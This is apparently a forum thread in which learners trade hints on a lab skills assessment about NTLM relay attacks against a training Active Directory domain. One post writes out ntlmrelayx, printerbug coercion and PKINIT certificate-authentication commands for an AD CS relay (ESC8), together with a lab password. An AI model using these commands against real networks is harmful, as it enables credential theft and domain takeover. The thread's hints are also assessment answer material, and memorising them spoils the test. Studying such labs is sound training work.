NTLM relay attacks skills assessment question 2

Hello everyone,

I’ve been encountering a challenging issue for the past two days and could use some guidance. Here’s what I’ve accomplished so far:

However, I’ve hit a roadblock. I’m unable to self relay onto the IP address 172.16.119.70.

The main issue is that none of the relays I’ve captured seem to have command execution capabilities, nor do they have the ability to write on shares on any of the hosts. This has left me at a standstill, and I’m unsure of the next steps to take.

Could anyone provide some advice or point me in the right direction to resolve this? Any help would be greatly appreciated.

Thank you!

I’m glued as well, any help and/or guidance would be appreciated

I finally got this.
If anyone needs help, feel free to DM me.

I am stuck on question 2 as well. No available shares, everything I have tried does not lead to a compromise of BACKUP01 machine.

Finally solved question 2. Phew!!

Hi, could you give me a hint on how you solved question two?
I was able to solve question 1 and 3 and I have the following information

Username Password
dob ?
mozhar ?
plaintext$ password123! (own computer)
sql_ftp_test SQ…3!
sqlftp Her…ord!
BACKUP01$ hash (not crackable)

I tried coercion several times and in different combinations, but I was able to access any share with writable access.

I wish I could remember… but unfortunately I did not take notes for this one. IF I’M NOT WRONG, it had to do with Certificate.

Hello,
Can someone help me with question number 2.
I got the following table with credentials:

Username Password
dob ?
mozhar ?
plaintext$ p…!
sql_ftp_test SQ…3!
sqlftp Her…ord!

I tried the ESC8 Attack:

# with DC01
python3 gettgtpkinit.py -dc-ip 172.16.119.3 -pfx-base64 $cert 'inlanefreight.local/dc01$' dc01.ccache

certipy auth -pfx dc01.pfx -dc-ip 172.16.119.3

# With BACKUP01$
python3 gettgtpkinit.py -dc-ip 172.16.119.3 -pfx-base64 $cert 'inlanefreight.local/backup01$' dc01.ccache

With both of them I get the response: Error Name: KDC_ERR_CLIENT_NAME_MISMATCH Detail: "Error message not found! Err code: 75"

What am I doing wrong here?

The hash was obtained using ntlmrelayx and printerbug:

# Relay for certificate
ntlmrelayx.py -t http://172.16.119.3/certsrv/certfnsh.asp -smb2support --adcs --template Machine

# Printerbug
python3 printerbug.py inlanefreight/plaintext$:'EuFX}3KM6TFv:nr'@172.16.119.20 172.16.119.3

It took me a couple or three days to solve this skills assessment, so here are some tips for people struggling in the future.

Whenever you are stuck with relaying NTLM, remember what you can do by checking the road map from Hacker Recipes: Road map image.
The first time I saw this image, it was confusing for me, but after completing the following sections I understood what it meant.

Question 2:

What @halfluke said is key, review the Advanced NTLM Relay Attacks Targeting AD CS section.

Question 3:
I do not understand how @Patota was able to obtain the password of user sqlftp before finishing question 2. Since, at least as of October 9, 2024, and the way I solved it, question 3 is a continuation of question 2 and is not independent.

Question 4:
It is much easier than question 2, but in case you’re struggling you might want to review the Farming Hashes section, taking advantage of what you have achieved with question 3.

Thank you this was helpful. Currently stuck on Question 3 trying to figure out how to leverage the Question 2 access.